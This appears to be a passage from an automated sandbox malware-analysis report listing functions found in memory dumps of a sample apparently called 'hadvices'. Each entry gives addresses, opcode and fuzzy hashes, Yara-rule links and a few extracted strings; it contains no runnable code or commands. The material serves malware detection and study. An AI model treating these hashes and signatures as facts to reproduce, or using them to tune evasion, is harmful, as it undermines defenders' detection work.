                                                      • Instruction Fuzzy Hash: 59D0677AB010089FCB049F98E8409DDB7B6FF9C221B448116E915A3265C6319961DB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01775F00 Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02bfd98894d97e58700f6c8d726e7f7ca47d172a904067bf4395cc6151ef33b2
                                                      • Instruction ID: 5ac4076a8ee30256011be140b1f299ac63b172142efd7b0c0f844fde4b007d33
                                                      • Opcode Fuzzy Hash: 02bfd98894d97e58700f6c8d726e7f7ca47d172a904067bf4395cc6151ef33b2
                                                      • Instruction Fuzzy Hash: 6AD02B709083468FD712F731E9041143F39BA80105BC084A1E8144D45FFE7D2C498762
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177CEFC Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1aefecec8e26e882258abcac186bf9cb86a19dd7bfb53c15d39d609b2c4a4e67
                                                      • Instruction ID: c968dcda1a2a9f464a0fbc11de4c43c65bbae48d166d1e953f1c3e1870b837c6
                                                      • Opcode Fuzzy Hash: 1aefecec8e26e882258abcac186bf9cb86a19dd7bfb53c15d39d609b2c4a4e67
                                                      • Instruction Fuzzy Hash: B5D04275E0410DCBCF24EFA5E9545DCBBB0EF4C222F24546AD925A3211D73055558F51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01775F10 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43a133960ebd97f0e89b0f6df516a3a8bce803568fcf382bc1e6cb52790d0368
                                                      • Instruction ID: 3db7a243403187c0056973f86584c5b0644551c58dfd8fff5a465d83f3ed8e65
                                                      • Opcode Fuzzy Hash: 43a133960ebd97f0e89b0f6df516a3a8bce803568fcf382bc1e6cb52790d0368
                                                      • Instruction Fuzzy Hash: 2AC0127450030A8BD615F776EA44555772ABAC0102F408510A0190955DDE787D8956A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 01667CB2 Relevance: 2.9, Strings: 2, Instructions: 402COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Teq$Teq
                                                      • API String ID: 0-2938103587
                                                      • Opcode ID: 7c18e751eb2385262aa0bc5c0dae988395300b394bb3bc2373395a6856c8f68c
                                                      • Instruction ID: 2d9c4369d4a8bbccf08cedc899673625cff4d86056ac1409bcbe7d6e0a1c10a9
                                                      • Opcode Fuzzy Hash: 7c18e751eb2385262aa0bc5c0dae988395300b394bb3bc2373395a6856c8f68c
                                                      • Instruction Fuzzy Hash: B7128D74A01228CFCB64DF65C994B99BBB2FF89301F1085E9D909A7364DB35AE81CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177E310 Relevance: .6, Instructions: 596COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ee389a463e129b5d15c9eb87459633bbab6a05ff605d0950622be66f1a8554f
                                                      • Instruction ID: d73efeb387e7b4d37b9587f6cab8cf94f1eb036d81e69394bce20b91a34c5119
                                                      • Opcode Fuzzy Hash: 3ee389a463e129b5d15c9eb87459633bbab6a05ff605d0950622be66f1a8554f
                                                      • Instruction Fuzzy Hash: 72529A74E01228CFEB64DF69C984BDDBBB2BB89301F1081EAD409A7254DB359E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016680B3 Relevance: .2, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c618b8ae3bd3f48440437819cfe4bd4038d120acda945283e7c2b261f8eedec
                                                      • Instruction ID: 6a7816472d93098d71a61208b769b1e6bd43c7d53219baf8b22541f5f763e720
                                                      • Opcode Fuzzy Hash: 1c618b8ae3bd3f48440437819cfe4bd4038d120acda945283e7c2b261f8eedec
                                                      • Instruction Fuzzy Hash: 8AA17F78A00218CFDB64DF69C894B99BBB1FF49311F1181D9E949AB361DB30AE91CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177E943 Relevance: .2, Instructions: 193COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b77e1560883884c7d3e5229564678877486d69ed63cca4a57036a95b76e51f62
                                                      • Instruction ID: e05cb7824879bed9c51ec3ceaf5c1f693ab85d6e383dc4e34b5ec8cde77da852
                                                      • Opcode Fuzzy Hash: b77e1560883884c7d3e5229564678877486d69ed63cca4a57036a95b76e51f62
                                                      • Instruction Fuzzy Hash: C9A16B74A01228CFDB69DF68C994BE9BBB2BF4A301F1085E9D409A7254DB319EC1CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177EB23 Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f9ad9a72b55e3e1a2fd2574fcc818537623fe955e7f88574dd2eebf29e8a2cd
                                                      • Instruction ID: f75c88d547ccad0bf3499ece1da698d2e2cdafaee7098e297d06e594e98bdd64
                                                      • Opcode Fuzzy Hash: 7f9ad9a72b55e3e1a2fd2574fcc818537623fe955e7f88574dd2eebf29e8a2cd
                                                      • Instruction Fuzzy Hash: E4518F74A01228CFCB69DF24C954BE9BBB2BF4A301F5095E9D40AA7354DB319E81CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017760E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \;q$\;q$\;q$\;q
                                                      • API String ID: 0-2933265366
                                                      • Opcode ID: 800f130cf609ae8e5de83127ce81e0fafdf4f60535ec03bebcbb2ef243da9d27
                                                      • Instruction ID: c8ef5be054be2ef185d5b7e34736cb9ef5e0b2ff6d296cc6748ba3b4ecd183cb
                                                      • Opcode Fuzzy Hash: 800f130cf609ae8e5de83127ce81e0fafdf4f60535ec03bebcbb2ef243da9d27
                                                      • Instruction Fuzzy Hash: A10184317009148FEF259A2DE448A25F7E7AF88664F2941B9F906CB36BDA31DC418790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%